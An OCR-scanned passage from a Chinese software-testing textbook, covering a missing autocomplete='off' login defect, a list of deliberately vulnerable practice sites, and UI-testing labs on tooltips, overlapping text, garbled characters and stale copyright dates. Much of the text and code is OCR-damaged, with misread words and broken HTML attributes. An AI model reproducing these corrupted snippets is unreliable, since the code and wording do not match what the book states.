期 望 结果 ”账户 与 密码 不 能 自动 保存 在 浏览 器 ,防止 信息 泄露 。 
实际 结果 ”账户 与 密码 能 自动 保存 在 浏览 器 ,如 图 1-38 所 示 , 缺 少 AUTOCOMPLETE=' 
OFF' 标 签 。 
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在 HTML 中 ,input 属性 autocomplete 默认 为 on, 其 含义 为 允许 浏览 器 自动 记录 用 户 
之 前 输入 的 值 。 很 多 时 候 需 要 对 客户 的 资料 进行 保密 ,以 防止 浏览 器 软件 或 者 恶意 插件 获 
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图 1-38 登录 框 缺少 AUTOCOMPLETE- 'OFF "bx E 


取 到 。 

例如 ,在 输入 用 户 名 与 密码 、 信 用 卡 与 交易 密码 等 隐秘 的 信息 时 ,需要 在 input 中 加 入 
autocomplete 一 "off" 来 关闭 记录 。 在 系统 需要 保密 的 情况 下 使 用 此 参数 。 

一 个 网 页 中 禁止 浏览 器 收集 用 户 E-mail 地 址 的 例子 程序 如 下 。 


< form action = "demo_form. asp" method = "get" autocomplete = "on"> 
First name:< input type = "text" name = "fname" /> < br /> 
Last name: < input type = "text" name = "lname" /> < br 人 > 
E-mail: < input type = "email" name = "email" autocomplete = "off" /> < br /> 
< input type = "submit" /> 
« /forn» 
autocomplete 属性 规定 输入 字段 是 否 应 该 启用 自动 完成 功能 。 自 动 完成 允许 浏览 器 预 
测 对 字段 的 输入 。 当 用 户 在 字段 开始 输入 时 ,浏览 器 基于 之 前 输入 过 的 值 ,应 该 显示 在 字段 
中 填写 的 选项 。 
autocomplete 属性 适用 于 < form >, 以 及 text, search, url, telephone, email, password, 


datepickers,range,color & < input > 类 型 。 


w 拓展 训练 


找 出 以 下 网 站 的 安全 缺陷 。 

(1) testfire 网 站 : http://demo. testfire. net, 

(2) testphp 网 站 : http://testphp. vulnweb. com. 

(3) testasp 网 站 : http://testasp. vulnweb. com, 

(4) testaspnet 网 站 : http://testaspnet. vulnweb. com, 
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(5) zero 网 站 : http://zero. webappsecurity. com, 

(6) crackme 网 站 : http://crackme. cenzic. com, 

(7) webscantest 网 站 : http://www. webscantest. com, 

(8) nmap 网 站 : http: //scanme. nmap. org. 

提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 与 安全 相关 的 缺陷 。 
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读书 笔记 Name: Date: 








励志 名 句 : Each man is the architect of his own fate. 





每 个 人 都 是 自己 命运 的 架构 师 。 
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用 户 界面 测试 Cuser interface testing. UI 测试 ) 主 要 测试 用 户 界 
面 的 功能 模块 布局 是 否 合理 ,整体 风格 是 否 一 致 ,各 个 控件 的 位 置 是 
否 符合 客户 使 用 习惯 ,此 外 还 要 测试 界面 操作 便捷 性 ,导航 简单 易 用 
性 ,页 面 元 素 可 用 性 ,界面 中 文字 是 否 正确 ,命名 是 否 统一 ,页 面 是 否 
美观 ,文字 ,图片 组 合 是 否 完美 等 。 

需要 提醒 的 是 ,对 于 国际 软件 测试 ,如 果 这 个 系统 是 基于 网 页 的 ， 
那么 测试 工程 师 需 要 至 少 在 TE, Firefox, Chrome 三 个 浏览 器 上 验证 
界面 显示 ; 如 果 这 个 系统 是 基于 客户 端 安装 的 ,那么 测试 工程 师 目前 
至 少 需要 在 Windows(Vista/7/8/10) , Mac OSCOS X 10. 6 以 上 ) 和 
Linux (Ubuntu, Debian, Fedora, OpenSUSE) F ZA fi HJ . Wit 4° pf 
程 的 界面 是 否 正 常 ; 如 果 这 个 系统 支持 手机 ,平板 等 手持 设备 ,那么 
常见 型 号 与 屏幕 大 小 的 手持 设备 都 要 进行 界面 验证 。 


2.1 实验 #1: oricity 网 站 图 片上 传 Tooltip 
显示 错 


缺陷 标题 oricity 网 站 ”我 的 城市 空间 ” 下“ 图片 上传 的 Tooltip 
显示 不 正确 。 
测试 平台 与 浏览 器 Windows 7 + Firefox 24.0 或 IE9 或 
Chrome 32.0。 
测试 步骤 
(1) 打开 oricity 网 站 http://www. oricity. com/。 
(2) Xs udi x XxX 的 城市 空间 ”。 
(3) 展开 “我 的 相册 ”, 将 鼠标 悬 停 在 “图 片上 传 " 上 。 
(4) 查看 Tooltip 结果 
MAAR Tooltip 描述 正确 。 
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实际 结果 Tooltip 描述 与 “图 片上 传 ” 功 能 不 符 , 显 示 为 “我 的 好 友 的 分 组 ”, 如 图 2-1 
所 示 。 
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图 2-1 文字 描述 不 正确 
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Tooltip 提示 应 用 于 当 用 户 不 知道 某 项 的 具体 功能 时 ,将 鼠标 指向 该 项 会 给 出 提示 信 
息 。 同 时 ,美国 对 网 站 的 设计 也 有 一 个 标准 ,就 是 支持 残疾 人 (比如 盲人 ) 也 能 正常 访问 网 
页 ,那么 这 个 时 候 Tooltip 上 的 文字 就 能 通过 读 屏 软件 读 出 来 。 一 般 要 求 所 有 的 图 片 和 表 
格 标题 框 等 要 加 Tooltip ,以 方便 使 用 。 

软件 测试 工程 师 在 测试 网 页 Tooltip 时 需要 关注 以 下 两 点 。 

(1) Tooltip 显示 的 文字 与 实际 是 否 一 致 。 本 例 中 就 不 一 致 ,此 时 容易 导致 误解 。 

(2) Tooltip 上 面 的 文字 是 否 只 能 在 IE 上 显示 而 在 Firefox 或 Chrome 浏览 器 上 不 

对 于 第 一 个 问题 ,主要 原因 是 开发 工程 师 粗 心 ,输入 错误 ,或 复制 粘贴 位 置 错 误 ; 对 于 
第 二 个 问题 ,主要 原因 是 开发 工程 师 对 网 页 中 图 片 等 提示 信息 在 各 个 浏览 器 上 的 不 同 缺少 
意识 。 例 如 ,< img src= " img/leaf520. png" alt 一 "点 击 返回 言 若 金 叶 主 站 " />, 这 段 
HTML 代码 中 关于 图 片 的 Tooltip 用 的 是 alt, 这 种 代码 只 对 IE 有 效 ,而 在 Firefox 或 
Chrome 上 不 显示 。 如 果 想 所 有 浏览 器 都 显示 ,应 该 写 为 < img src 一 "img/leaf520. png" 
title 一 " 单 击 返 回 言 若 金 叶 主 站 " />, 也 就 是 说 alt 的 Tooltip 只 有 IE 内 核 才能 显示 ,而 title 
的 Tooltip 在 所 有 浏览 器 中 都 能 显示 。 


2.2 KHZ: books 专著 网 站 显示 无 意义 的 复 选 杠 

缺陷 标题 《生命 的 足迹 /The Footprints of Life》 目 录 结 构 页 面 出 现 了 无 意义 的 复 
选 框 。 

测试 平台 与 浏览 器 Windows 7 十 IE 10。 
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测试 步骤 
(1) 进入 生命 的 足迹 》 书 籍 首页 http: //books. roqisoft. com/footprints, 
(2) 单 击 “ 目 录 结 构 ” 进 入 http://books. roqisoft. com/footprints/footprints_ list. 
html 页 面 。 
(3) 勾 选 部 分 复 选 框 ,观察 页 面 响应 。 
期 望 结果 页面 上 的 每 个 控件 都 有 实际 意义 。 
实际 结果 页 面 中 的 复 选 框 控 件 没有 实际 意义 ,如 图 2-2 所 示 。 





封面 A 封底 ”出 版 原因 ”目录 结构 ”读者 推荐 ”获奖 名 单 ”网 上 购买 ”联系 我 们 ”相关 书籍 


中 英 双语 大 学 生 励 志 与 心理 健康 读本 
《生命 的 足迹 / The Footprints of Life》 


中 英 双 语 大 学 生 励 去 与 心理 健康 读本 《生命 的 足 连 /The Footprints of Life》 目 录 结 构 
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页 面 有 宛 余 图 标 、 文 字 、 链 接 ,或 者 无 意义 的 选择 项 ,这 些 都 可 能 成 为 界面 验证 的 功能 
点 。 除 了 这 些 , 界 面 还 经 常 出 现 文字 与 文字 重 登 文字 与 图 像 重 登 、 图 像 与 图 像 重 梧 文字 被 
截断 ,文字 没 对 齐 、 部 分 文字 丢失 ,文字 不 正常 换行 ,文字 显示 为 乱码 等 。 

界面 测试 主要 考察 的 是 测试 工程 师 的 耐心 与 细心 程度 ,并 且 大 多 数 不 能 自动 化 测试 , 原 
因 如 下 。 

A) 自动 化 测试 难以 判断 界面 上 的 控件 是 否 显示 正常 ,比较 容易 判断 控件 是 否 存在 。 

(2) 界面 改动 频繁 ,自动 化 测试 用 例 的 维护 成 本 太 高 。 

(3) 不 同 的 机 器 ,界面 显示 不 一 样 。 

(4) 不 同 的 分 辨 率 ,不 同 的 浏览 器 ,不 同 的 显示 器 ,都 会 导致 界面 显示 不 一 样 。 

另外 ,对 于 字体 颜色 、 图 文 搭配 综合 在 一 起 是 否 美观 ,自动 化 测试 很 难 判 断 。 











图 2-2 网 页 出 现 无 意义 的 复 选 框 
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2.3 SEU 33: rogisoft 论坛 搜索 文字 显示 溢出 


缺陷 标题 roqisoft 诺 顾 软件 论坛 ,搜索 输入 文字 较 多 时 返回 结果 文字 显示 溢出 。 
测试 平台 与 浏览 器 ”Windows XP 十 Firefox。 
测试 步骤 

CD 打开 诺 顾 软件 论坛 网 站 http://leaf520. rogisoft. com/bbs/. 

(2) 单 击 “ 高 级 搜索 ”链接 。 

(3) 在 “搜索 "文本 框 输入 超 长 数据 (大 于 200 字符 ) ,如 图 2-3 Bron o 
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图 2-3 在 “搜索 ”文本 框 输入 超 长 数据 
OD 观测 搜索 结果 ,如 图 2-4 所 示 。 
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图 2-4 字符 超出 页 面 造 成 界面 不 友好 
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HAAR 各 页 面 元 素 显示 正确 。 
实际 结果 “搜索 结果 过 长 没有 提示 ,字符 超出 页 面 造成 界面 不 友好 。 


D 专家 点 评 


对 界面 进行 测试 ,通常 是 在 文本 框 中 输入 超 长 数据 ,观察 界面 的 友好 度 ,大 部 分 网 站 对 
于 超 长 数据 的 处 理 表 现 如 下 。 

COD 出 现 字符 超出 溢出 错误 ,就 像 本 例 中 一 样 。 

(2) 出 现 SQL 错误 ,或 者 无 法 正常 运行 。 

有 时 开发 人 员 会 拒绝 这 个 Bug, 说 客户 不 会 输入 这 么 长 的 数据 ,但 这 种 解释 是 不 合理 
的 ,如 果 程 序 员 对 输入 不 做 必要 的 限制 ,就 会 导致 后 面 出 现 许多 问题 。 界 面 测 试 主要 考察 测 
试 人 员 的 认真 、 细 心 \ 耐 心 和 速度 ,这 是 对 测试 人 员 基本 功 的 检验 。 


2.4 实验 #4: qa 网 站 页 面 文字 显示 重合 


缺陷 标题 “ 诺 顾 软 件 测试 团队 主页 在 不 同 浏览 器 窗口 伸缩 出 现 页 面 文 字 重 盈 。 
测试 平台 与 浏览 器 ”Windows 7(64 bit) 十 IE 9 或 Firefox 24. 0, 
测试 步骤 
(1) 打开 诺 顾 软件 测试 团队 官网 http: //qa. rogisoft. com, 
(2) 分 别 缩小 IE 与 Firefox 窗口 ,观察 主页 信息 。 
期 望 结 果 各 页 面 元 素 显 示 正 确 。 
实际 结果 在 Firefox 上 有 文字 界面 排版 重生 的 问题 ,在 IE 中 没有 该 现象 ,如 图 2-5 所 示 。 
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(b) Firefox 


图 2-5 Firefox EX os 3E E 
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Do eran 


参见 2.2 节 实 验 #2 的 专家 点 评 。 


2.5 KRES: testfire 网 站 显示 垃圾 字符 


缺陷 标题  AltoroMutual-* PERSONAL 页 面 文字 出 现 垃圾 字符 。 
测试 平台 与 浏览 器 Windows 8. 1 十 IE 11 或 Chrome 37.0。 
测试 步骤 
(1) 打开 testfire 网 站 http://demo. testfire. net, 
(2) 单 击 PERSONAL, RAH http://demo. testfire. net/default. aspx? content = 
personal. htm, 
(3) 观察 页 面 每 一 项 元 素 。 
期 望 结 果 页面 每 一 项 元 素 显 示 正 确 。 
实际 结果 IE 和 Chrome 中 都 出 现 垃圾 字符 ,如 图 2-6 所 示 。 


T5 Ahoro Mutual 
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Whether you're looking for a savings or checking account, credit card, or personal loan, our 
solutions are designed to make banking as efficent and cost effective as possible. 
Deposit Products. 


Find out about our different deposit products, and decide which option wii best suit you as you. 
strive to save and grow your money. 


Checking 


Learn more about our checking accounts and find one that matches your individual needs. 


Loans 
Find the right solution for your borrowing 
or simply financing vour dreams. 


Cards 
Learn more about cur diverse card products, Ahoro Mutual provides the flexibiity you require. 
Investments 

Find out how Atoro Mutual investment products can help you reach your Investment goals. 














rac Palice | Secun Statement | € 2014 Aloro Put, Tne- 


xS enan 


UI 测 试 中 ,经 常 出 现 页 面 信 息 文字 乱码 的 问题 。 特 别 是 中 文 、 繁 体 中 文 、 日 语 、 韩 语 这 
几 种 文字 。 这 些 文字 不 在 标准 ASCI 码 128 位 之 内 ,编码 占 的 字 节 数 又 大 于 1 位 ,所 以 经 
常 在 超 长 截取 字符 时 ,导致 最 后 一 位 字符 被 截 了 一 半 , 而 显示 最 后 一 个 字符 为 乱码 。 

也 有 一 种 可 能 是 程序 员 在 设计 网 页 编码 或 存 数 据 库 时 没有 很 好 地 考虑 国际 化 ,只 使 用 
本 地 字符 集 , 导 致 如 果 系统 没 安 装 本 地 字符 集 , 或 浏览 器 没 指定 特定 字符 集 , 就 会 出 现 网 页 
乱码 。 





图 2-6 网 页 显示 垃圾 字符 
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还 有 可 能 原先 网 页 是 在 Word 文档 上 构建 的 ,后 来 直接 复制 生成 网 页 ,导致 一 些 不 可 见 
字符 的 破坏 ,产生 页 面 乱码 。 


2.6 SEU 6: crackme 网 站 首页 图 片 没 对 齐 


缺陷 标题 ”crackme 网 站 首页 图 片 没有 对 齐 。 
测试 平台 与 浏览 器 ”Windows 7 十 IE 9. 0. 8 或 Firefox. 
测试 步骤 
(1) 打开 crackme 网 站 http://crackme. cenzic. com。 
(2) 观察 首页 的 文字 与 图 片 显示 。 
期 望 结果 ”图片 都 对 齐 。 
实际 结果 ”部 分 图 片 没 有 对 齐 , 如 图 2-7 所 示 。 
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图 2-7 首页 图 片 大 小 不 一 并 且 没 对 齐 


DS RAN 


页 面 同一 栏目 下 的 几 张 图 片 大 小 应 该 一 样 ,并 且 需 要 对 齐 。 两 张 图 片 中 间 需 要 留 部 分 
空白 。 如 果 一 张 图 片 有 边框 , 则 同类 的 其 他 图 片 也 需要 有 边框 。 图 片 时 大 时 小 ,或 有 的 图 片 
有 边框 有 的 图 片 没有 边框 ,会 使 网 站 看 起 来 显得 业余 ,不 够 专业 。 


2.7 实验 #7: crackme 网 站 页 脚 有 重复 链接 


缺陷 标题 crackme 网 站 页 脚 有 重复 链接 。 
测试 平台 与 浏览 器 Windows 7 十 Firefox。 


实验 2 软件 界面 测试 训练 


测试 步骤 
(1) 打开 crackme 网 站 http: //crackme. cenzic. com, 
(2) 检查 网 页 上 面 的 元 素 。 
期 望 结果 ”没有 重复 链接 。 
实际 结果 页 脚 有 两 处 重复 链接 Privacy and Security 和 Terms of Use, 如 图 2-8 
所 示 o 




















图 2-8 页 脚 有 两 处 重复 链接 


DELLI, 


网 页 出 现 重复 的 图 片 、 文 字 或 链接 也 是 界面 测试 中 经 常 出 现 的 问题 ,这 主要 是 开发 工程 
师 多 按 了 一 次 Ctrl 十 C、Ctrl 十 V 组 合 键 。 做 好 界面 测试 需要 测试 工程 师 多 关注 细节 。 


2.8 实验 #8: jsebook 文字 显示 被 剪裁 


缺陷 标题 ”在 诺 顾 电子 杂志 出 现 文字 显示 不 完整 。 
测试 平台 与 浏览 器 ”Windows 7 十 Chrome 44.0 或 Firefox 40.0。 
测试 步骤 
(1) 打开 诺 顾 电子 杂志 网 站 http://jsebook. roqisoft. com. 
(2) 翻 到 第 2 页 ,分 别 在 Firefox 和 Chrome 中 观察 页 面 元 素 。 
期 望 结果 页面 元 素 显示 正常 。 
实际 结果 fE Chrome 中 页 面 元 素 显 示 不 全 ,如 图 2-9 所 示 ; Firefox 中 显示 正常 ,如 
图 2-10 所 示 。 


DS 专 家 点 评 


参见 2.2 节 实验 井 2 的 专家 点 评 。 
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2-10 Firefox 中 显示 正常 


2.9 实验 #9: oricity 网 站 登录 界面 布局 不 合理 


缺陷 标题 oricity 网 站 主页 一 登录 一 找 回 密 码 一 我 的 日 历 页 面 登录 页 面 布局 不 合理 。 
测试 平台 与 浏览 器 Windows 7 + Chrome 或 IE, 
测试 步骤 

(1) 用 Chrome/IE 打开 oricity 网 站 主页 http://www. oricity. com/ , 

(2) 单 击 “登录 ”按钮 。 


实验 2 软件 界面 测试 训练 x 


(3) 输入 不 存在 的 用 户 名 与 密码 。 
OD 在 用 户 不 存在 出 错 提示 页 单 击 “ 我 的 日 历 ”。 
(5) 查看 页 面 。 
期 望 结果 ”登录 页 面板 块 边框 正常 显示 ,页 面 布 局 合理 。 
实际 结果 ”页面 布局 不 合理 ,存在 大 块 空白 ; DE 浏览 器 登录 模块 右边 框 不 能 正常 显 
示 , 如 图 2-11 和 图 2-12 所 示 。 
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图 2-11 Chrome 浏览 器 下 边框 正常 显示 



































图 2-12 下 浏览 器 右边 框 未 能 正常 显示 
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Do wasis 


这 个 Bug 有 两 个 方面 的 界面 设计 问题 : 一 是 这 个 区 域 空白 比较 大 ,“ 用 户 名 ”与 “密码 ” 
应 该 在 同一 行 显示 ,不 应 该 转 为 多 行 显示 ; 二 是 登录 四 周 的 边线 框 在 IE 中 不 能 正常 显示 ， 
但 在 Chrome 中 可 以 。 

页 面 布局 不 合理 ,往往 一 眼看 上 去 没什么 界面 问题 ,但 是 影响 了 用 户 体验 度 。 有 一 种 专 
门 针 对 用 户 体 验 的 测试 叫做 可 用 性 测试 ,检验 其 是 否 达到 了 可 用 性 的 标准 。 

网 站 可 用 性 测试 是 为 了 实现 跨 形 式 的 视觉 一 致 性 ,包括 测试 页 面 布局 合理 性 ,屏幕 分 辨 
率 改 变 时 的 显示 , 边 距 和 列 布局 ,表单 的 颜色 和 大 小 ,标签 使 用 的 字体 ,按钮 的 大 小 ,所 使 用 
的 热 键 或 快捷 键 ,使 用 的 动画 、 图 形 、 按 钮 等 控件 的 标签 ,同一 字段 的 文本 框 的 长 度 ,以 及 日 
期 和 时 间 字 段 的 格式 等 的 可 用 性 。 


2.10 实验 #10: crackme 网 站 版 权 信息 过 期 


缺陷 标题 crackme 网 站 版 权 信息 过 期 。 
测试 平台 与 浏览 器 Windows 7 十 Firefox 或 Chrome, 
测试 步骤 

(1) 打开 crackme 网 站 http://crackme. cenzic. com, 

(2) 浏览 主页 底部 。 
期 望 结果 ”版权 日 期 与 当年 实际 日 期 一 致 。 
实际 结果 版权 日 期 与 当年 实际 日 期 不 同 , 如 图 2-13 所 示 。 











(G | © crackme.cenzic.com/kelev/view/home.php 


> Net Banking 
? Credit Cards 
> Online Trading 
> Contact Us 

? Bills Online 

> Not a Member 
> Login 






42004 CrackMeBank Investments 


2004-2006 frackMeBank Investments 


2-13 ”版权 显示 的 日 期 没有 更 新 








实验 2 ”软件 界面 测试 训练 





x 专家 点 评 


网 页 版 权 的 信息 应 该 随时 间 不 断 变化 ,如 果 写 成 国定 的 某 一 年 , 则 过 了 这 一 年 ,版 权 信 
息 就 不 对 了 。 在 实际 的 国际 软件 测试 时 ,测试 工程 师 经 常 发 现 有 些 网 站 版 权 信息 不 对 。 

这 主要 是 网 页 的 开发 工程 师 没 有 把 年 份 作为 一 个 变量 来 实时 计算 当前 的 年 份 ,而 是 简 
单 地 写成 了 网 页 开发 时 的 年 份 。 


2.11 实验 #11: crackme 网 站 出 现 乱码 字符 


缺陷 标题 crackme 网 站 Online Trading 页 面 出 现 乱 码 字符 。 
测试 平台 与 浏览 器 Windows 7 十 Firefox 或 IE 11。 
测试 步骤 
(1) 打开 crackme 网 站 http: //crackme. cenzic. com, 
(2) 单 击 左 侧 链接 Online Trading. 
(3) 观察 页 面 元 素 。 
期 望 结果 ”页面 元 素 显示 正确 。 
实际 结果 ”页面 出 现 字符 乱码 ,如 图 2-14 所 示 。 
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2-14 页 面 出 现 字符 乱码 


xS 专家 点 评 





参见 2.5 节 实 验 #5 的 专家 点 评 。 
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A 
2.12 实验 #12 : oricity 网 站 注册 页 面 文字 未 对 齐 


缺陷 标题 oricity 网 站 一 注册 一 用 户 注册 页 面 文字 未 对 齐 。 
测试 平台 与 浏览 器 Windows 7 十 IE 10。 


测试 步骤 
(1) 打开 oricity 网 站 官网 http://www. oricity. com/ , 
(2) 单 击 主页 “注册 ”按钮 进入 注册 页 面 。 
(3) 在 注册 页 面 检查 每 一 项 元 素 。 
期 望 结果 “用户 注册 页 面 版 面 文字 排列 整齐 。 
实际 结果 ”用户 注 册页 面 版 面 文字 排列 不 整齐 ,如 图 2-15 所 示 。 
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图 2-15 用 户 注册 页 面 版 面 文字 排列 不 整齐 


PELLI] 


文字 不 对 齐 是 界面 常 出 现 的 问题 ,本 例 中 细心 的 测试 人 员 会 发 现 “( 一 )” 与 其 他 的 要 求 
未 能 对 齐 。 测 试 人 员 需 要 非常 细心 .认真 才能 发 现 一 些 隐藏 比较 深 的 页 面 问题 。 


2.13 SKD X 13: leaf520 网 站 某 合 作 院 校 图 片 不 显示 


缺陷 标题 ” 言 若 金 叶 软 件 研究 中 心 网 一 合作 院 校 ~~Chrome 或 IE 访问 有 图 片 不 显示 。 
测试 平台 与 浏览 器 Windows 7 十 IE 9 或 Chrome, 


测试 步骤 
COD 打开 言 若 金 叶 软件 研究 中 心 备份 网 http://leaf520. roqisoft. com/. 
(2) 单 击 导 航 条 上 的 “智力 储备 ”>“ 合 作 院 校 " 链 接 。 
(3) 观察 链接 网 页 上 的 信息 。 


实验 2 软件 界面 测试 训练 


HAAR ”各 页 面 元 素 显示 正确 。 
实际 结果 ”在 IE WI Chrome 上 ,合作 院 校 最 后 一 张 图 片 均 不 显示 ,如 图 2-16 所 示 。 





图 2-16 合作 院 校 最 后 一 张 图 片 不 显示 


LACE 专家 点 评 

界面 上 图 片 不 显示 问题 也 是 常见 的 ,主要 原因 如 下 

(1) 网 站 的 图 片 被 移 除 , 没 有 及 时 更 新 图 片 ; 或 图 片 更 新 了 ,但 代码 没有 及 时 更 新 , 导 
致 找 不 到 图 片 。 

(2) 图 片 指向 的 是 外 站 的 图 片 链接 ,外 站 的 图 片 已 经 删除 ,导致 本 站 的 图 片 不 能 显示 。 

这 里 程序 员 要 注意 ,网 站 中 的 图 片 尽 量 不 要 用 外 链 的 ,因为 不 能 保证 外 链 的 图 片 一 直 
存在 。 


2.14 ”实验 #14: leafS20 大 学 生 软件 竞赛 文字 重 释 


缺陷 标题 “ 言 若 金 叶 软件 研究 中 心 习 2017 全 国 大 学 生 软 件 实践 与 创新 能 力 大 赛 , 界 面 





WEGE S. 
测试 平台 与 浏览 器 Windows 7+ Chrome 54. 0 
测试 步骤 


Ey 


CD 打开 言 若 金 叶 软件 研究 中 心 网 站 http://leaf520. roqisoft. com/. 

(2) 单 击 页 面 右 侧 “ 最 新 文章 ”中 的 “2017 全 国 大 学 生 软 件 实践 与 创新 能 力 大 赛 "或 
搜索 “全 国 大 学 生 软 件 实践 与 创新 能 力 大 赛 " 并 打开 网 页 。 

(3) 查看 网 页 右 侧 的 言 若 金 叶 微 信 公众 号 、 最 新 文章 。 
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期 望 结果 ” 言 车 金 叶 微 信 公 众 号 .最 新 文章 的 排版 不 会 影响 页 面 的 其 他 布局 。 
实际 结果 言 若 金 叶 微 信 公众 号 .最 新 文章 的 排版 与 整体 排版 出 现 重 和 至 ,如 图 2-17 所 示 。 


2017 全 国 大 学 生 软件 实践 与 创新 驴 力 大 塞 (L 上 半年 报 各 时 间 : 3 月 1 日 至 5 月 1 日 ,下 半年 报名 时 D 
li: 9 月 1 日 至 11 月 1 日 ) 可 提前 预约 报名 


本 文 引 自 2017 全 国 大 学 生 软 件 实践 与 创新 能 力 大 赛 启 网 报道 : http:/ /collegecontest.rogisoft.com/2017 
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一 、 组 织 机 构 全 国 大 学 生 软件 实 吕 与 创 
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图 2-17 ”大学生 竞 赛 报道 网 页 有 文字 重叠 现象 


$. 最 新 文章 中 的 “2016 全 国 大 学 生 软 件 实践 与 创新 能 力 大 赛 "与 “2015 全 国 大 学 生 软 
件 实 践 与 创新 能 力 大 赛 -获奖 选 手 名 单 " 也 有 上 述 Bug. 


x 专家 点 评 


UI 测 试 中 ,经 常 出 现 图 片 与 图 片 重 登 、 图 片 与 文字 重 登 文字 与 文字 重 登 的 问题 。 有 的 
虽然 在 IE 不 重 登 ,但 到 Firefox 或 Chrome 就 会 重 登 在 一 起 ,这 是 由 于 网 页 的 排版 主要 用 
CSS 技术 ,而 3 个 浏览 器 的 研发 分 属 3 家 公司 ,它们 的 技术 实现 和 对 一 些 功能 的 支持 不 一 
样 ,所 以 经 常 导致 一 个 浏览 器 显示 正常 . 另 一 个 浏览 器 不 能 正常 工作 的 现象 。 

我 们 要 求 做 国际 软件 测试 的 工程 师 , 至 少 要 装 3 个 浏览 器 , 即 IE, Firefox 5 Chrome. 
对 网 页 的 验证 也 是 3 个 浏览 器 都 要 进行 。 


2.15 实验 #15: books 网 站 同一 本 书 书 名 两 处 显示 不 一 致 


缺陷 标题 ”books 网 站 一 Web 网 站 漏洞 扫描 与 渗透 攻击 工具 揭秘 一 同一 本 书 书 名 两 处 
不 一 致 。 
测试 平台 与 浏览 器 Windows 7 十 IE 8 或 Chrome, 
测试 步骤 
CD 打开 言 若 金 叶 软件 研究 中 心 -软件 工程 师 成 长 之 路 系列 丛书 网 站 http://books. 
roqisoft. com, 
(2) 单 击 ( Web 网 站 漏洞 扫描 与 渗透 攻击 工具 揭秘 ) 一 书 的 图 片 , 如 图 2-18 所 示 。 
(3) 进入 具体 书籍 官网 http://books. roqisoft. com/wstool。 
(4) 观察 文档 是 否 有 误 。 
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言 若 金 叶 软件 研究 中 心 - 软件 工程 师 成 长 之 路 系列 从 书 
(重点 大 学 软件 工程 规划 系列 教材 - 软件 工程 师 系列 实践 指南 丛书 - 动态 展示 官网 ) 
免费 在 线 公开 课 预约 报名 及 公开 课 视频 下载 : http://openclass.roqisoft.com 











图 2-18 打开 (Web 网 站 漏洞 扫描 与 渗透 攻击 工具 揭秘 ) 书 籍 图 片 


期 望 结果 ”文档 格式 正确 ,无 错别字 , 且 书 名 上 下 文 一 致 。 
实际 结果 ” 书 名 上 下 文 显示 不 一 致 ,一 个 是 “Web 网 站 ”, 另 一 个 是 "Web 安全 网 站 ”, 如 


图 2-19 所 示 。 
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高 等 学 校 网 络 空间 安全 专业 规划 教材 
《Web 网 站 漏洞 扫描 与 渗透 攻击 工具 揭秘 》 
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图 2-19 书 名 显示 不 一 致 


专家 点 评 
在 UI 测试 时 经 常会 出 现 英语 单词 拼写 错误 、 中 文 错别字 、 标 点 符号 错 等 问题 。 本 例 出 
现 的 是 两 处 介绍 同一 本 书 的 书 名 不 一 致 。 虽 然 这 是 小 细节 ,但 是 对 于 一 个 网 站 而 言 ,开发 好 
后 需要 不 断 地 阅读 ,观察 ,找到 可 能 存在 的 任何 问题 并 及 时 修复 。 


2.16 ”实验 #16: 智慧 绍兴 -刻字 -图 片 显示 问题 


缺陷 标题 “到 此 一 游 一 电子 刻字 , 单 击 电子 刻字 ,底部 展示 图 片 在 不 同 浏览 器 显示 
KM. 


NA 
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测试 平台 与 浏览 器 Windows 10 十 IE 11 或 Chrome 或 Firefox。 
测试 步骤 
CD 打开 智慧 绍兴 网 站 http://www. roqisoft. com/zhsx。 
(2) 单 击 导航 条 中 的 “到 此 一 游 ”。 
(3) 单 击 电子 刻字 一 体验 电子 刻字 ,将 页 面 拉 至 底 端 。 
期 望 结果 界面 所 有 元 素 在 所 有 浏览 器 显示 都 相同 。 
实际 结果 页面 底 端 图 片 在 不 同 浏览 器 显示 不 相同 ,如 图 2-20 一 图 2-22 所 示 。 
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图 2-20 Firefox 展示 能 左右 滚动 
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调整 文字 位 置 
攻略 : 拖拉 油 整 文字 位 置 ， 请 不 要 超出 图 片 范围 ， 否则 字 不 会 出 现在 图 片上 !! 
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图 2-21 Chrome 浏览 器 展示 能 左右 滚动 
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调整 文字 位 置 
攻略 : 拖拉 调整 文字 位 置 ， 请 不 要 超出 图 片 范围 ， 否 则 字 不 会 出 现在 图 片上 ) 
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图 2-22 IE11 浏览 器 只 显示 一 张 图 片 并 不 断 改变 当前 图 片 
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前 端 开 发 工程 师 经 常会 遇 到 在 代码 相同 的 情况 下 ,IE 与 Firefox 和 Chrome 显示 不 同 。 
有 些 功 能 在 一 个 浏览 器 上 能 实现 ,在 另 一 个 浏览 器 上 却 不 能 实现 。 

前 端 开发 工程 师 常 用 的 解决 方案 如 下 。 

(1) 垂直 居中 问题 。 在 导航 条 中 ,IE 中 文本 向 上 显示 ,这 是 因为 没有 设置 行 高 而 导致 
的 不 兼容 ,解决 方法 是 将 line-height 的 值 设置 得 和 height 一 样 ,同时 设置 vertical-align: 
middle, 问题 就 可 解决 。 

(2) 圆 角 问题 。 经 常会 在 IE 9 以 下 的 浏览 器 中 看 到 一 些 网 站 的 轮 播 图 下 面 的 光圈 显 
示 为 正方 形 , 没 有 圆 角 ,这 是 因为 border-radius 这 个 元 素 只 在 IE 9 十 \Firefox 4 十 ,Chrome、 
Safari 5 十 以 及 Opera 中 得 到 支持 ,要 想 解决 这 个 问题 只 能 通过 JavaScript. 

(3) 解决 IE 8 的 兼容 性 。 





«meta http- equiv = "X — UA - Compatible" content = "IE = edge" /> 


X-UA-Compatible 是 针对 IE 8 新 加 的 一 个 设置 ,只 有 IE 8 能 识别 ,而 edge 是 模式 通知 
IE 以 最 高 级 别 的 可 用 模式 显示 内 容 ,实际 上 破坏 了 锁定 模式 。 


< meta http- equiv = "X- UA— Compatible" content = "IE - 7" /> 
无 论 页 面 是 否 包含 <!DOCTYPE > 指令 , 均 使 用 IE 7 894i: RRR, 
«meta http- equiv = "X — UA - Compatible" content = "IE = EmulateIE7" /> 


EmulateIE7 模式 通知 IE 使 用 <1DOCTYPE > 指令 确定 如 何 呈 现 内 容 。 标 准 模式 指 
令 以 IE7 标 准 模式 显示 ,而 Quirks 模式 指令 以 IE5 模 式 显 示 。 与 IE7 模 式 不 同 ， 
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EmulateIE7 模式 遵循 <1DOCTYPE > 指令 。 对 于 多 数 网 站 来 说 , 它 是 首选 的 兼容 性 
模式 。 
当然 ,这 些 需要 不 断 地 积累 。 遇 到 兼容 的 问题 ,可 以 主动 去 网 上 查询 解决 方案 。 


